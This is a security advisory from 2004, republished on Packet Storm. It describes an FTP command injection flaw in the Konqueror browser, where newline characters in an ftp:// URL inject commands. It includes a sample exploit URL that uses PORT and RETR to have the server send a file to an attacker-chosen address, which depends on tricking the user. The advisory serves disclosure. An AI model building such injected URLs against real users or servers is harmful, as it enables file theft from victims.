exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

7a69ezine Advisory 16

7a69ezine Advisory 16
Posted Dec 12, 2004
Authored by 7a69ezine | Site 7a69ezine.org

The Konqueror web browser fails to properly filter FTP requests to disallow for local command execution. Versions 3.3.1 and newer are affected.

tags | advisory, web, local
SHA-256 | 7f77bd00ca2b228448b93ab3f8771df0a2ca1907aa31108cc3cb5080cd5e42e7

7a69ezine Advisory 16

Change Mirror Download
- ------------------------------------------------------------------
7a69ezine Advisories 7a69Adv#16
- ------------------------------------------------------------------
http://www.7a69ezine.org [05/12/2004]
- ------------------------------------------------------------------

Title: Konqueror FTP command injection

Author: Albert Puigsech Galicia - <ripe@7a69ezine.org>

Software: Konqueror browser

Versions: >= 3.3.1

Remote: yes

Exploit: yes

Severity: Low-Medium

- ------------------------------------------------------------------



I. Introduction.

Konqueror is a very multifuncional HTTP browser included on KDE base package.
Like others browsers it can use more protocols, for example FTP. This
aplication is usualy used to navigate through the filesystems.


II. Description.

In order to access to a server FTP using Internet Explorer you write
"ftp://ftpuser:ftppass@server/directory" in the directions's bar and then the
navigator connects to the server and executes the following commands (and
other that have omitted because they are not important for this stuff).

USER ftpuser
PASS ftppass
CWD /directory/

The security problem resides in which is posible to inject FTP commands on
the URL adding at the code %0a followed by your injected commands. If you do
"ftp://ftpuser:ftppass@server/directory%0asomecommand%0a" it will execute
those commands.

USER ftpuser
PASS ftppass
CWD /directory
somecommand

The last line is an erroneous command, but it's not a problem because
'somecommand' has already been executed.


III. Exploit

You need to deceive a user to go to your URL and then to introduce a valid
user and password. So yes! The explotation also requires to apply social
engineering. Then you can do a lot of things using this bug like create or
delete files and directories, but probably, the most interesting thing is to
download files. Its posible to do that using this URL;

ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

Then the server will connect to a.b.c.d and port e,f (see FTP RFC to
translate the port number) and will send the file data.


IV. Patch

Konqueror developers have been contacted, and patch will be avaliable soon.


V. Timeline

01/12/2004 - Bug discovered
02/12/2004 - KDE developers contacted
03/12/2004 - Fast developers reply
03/12/2004 - IE also afected, so we decide to publish the bug
05/12/2004 - Advisor released



VI. Extra data

You can find more 7a69ezine advisories on this following link:

http://www.7a69ezine.org/avisos/propios [spanish info]
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close